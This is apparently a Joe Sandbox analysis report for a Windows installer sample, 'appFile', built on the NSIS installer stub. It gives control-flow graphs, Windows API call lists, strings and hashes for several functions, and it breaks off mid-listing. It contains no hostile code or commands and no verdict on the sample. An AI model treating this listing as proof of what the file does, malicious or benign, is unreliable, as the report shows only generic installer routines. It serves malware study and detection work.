                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                        APIs
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                        Strings
                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,ObservationBracelets,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,ObservationBracelets,ObservationBracelets,00000000,00000000,ObservationBracelets,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ObservationBracelets
                                                                                                                                        • API String ID: 4286501637-120668775
                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                        Strings
                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
